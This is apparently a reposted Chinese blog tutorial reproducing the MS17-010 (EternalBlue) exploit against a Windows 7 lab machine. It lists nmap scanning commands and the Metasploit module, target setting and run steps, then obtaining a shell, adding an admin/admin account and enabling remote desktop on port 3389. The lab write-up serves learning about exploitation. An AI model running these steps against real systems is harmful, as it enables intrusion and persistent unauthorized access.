MS17010(永恒之蓝)漏洞复现

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

nmap -sP 192.168.229.0/24

得到:
IP:192.168.229.169
在这里插入图片描述

然后利用:

nmap --script=vuln 192.168.229.169

得到靶机信息:

在这里插入图片描述

发现可能利用的漏洞:
ms17-010

然后启动msf

msfconsole

然后查找漏洞路径:

search ms17-010

在这里插入图片描述
使用payload进行攻击:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run

在这里插入图片描述
然后输入:shell

在这里插入图片描述

然后在查看当前用户:

net user

在这里插入图片描述
发现用乱码可以用这个取消乱码:

chcp 65001

然后添加一个admin用户密码也为admin

在这里插入图片描述

然后开启3389端口:

在这里插入图片描述

然后在开启远程控制:

在这里插入图片描述

得到:

在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>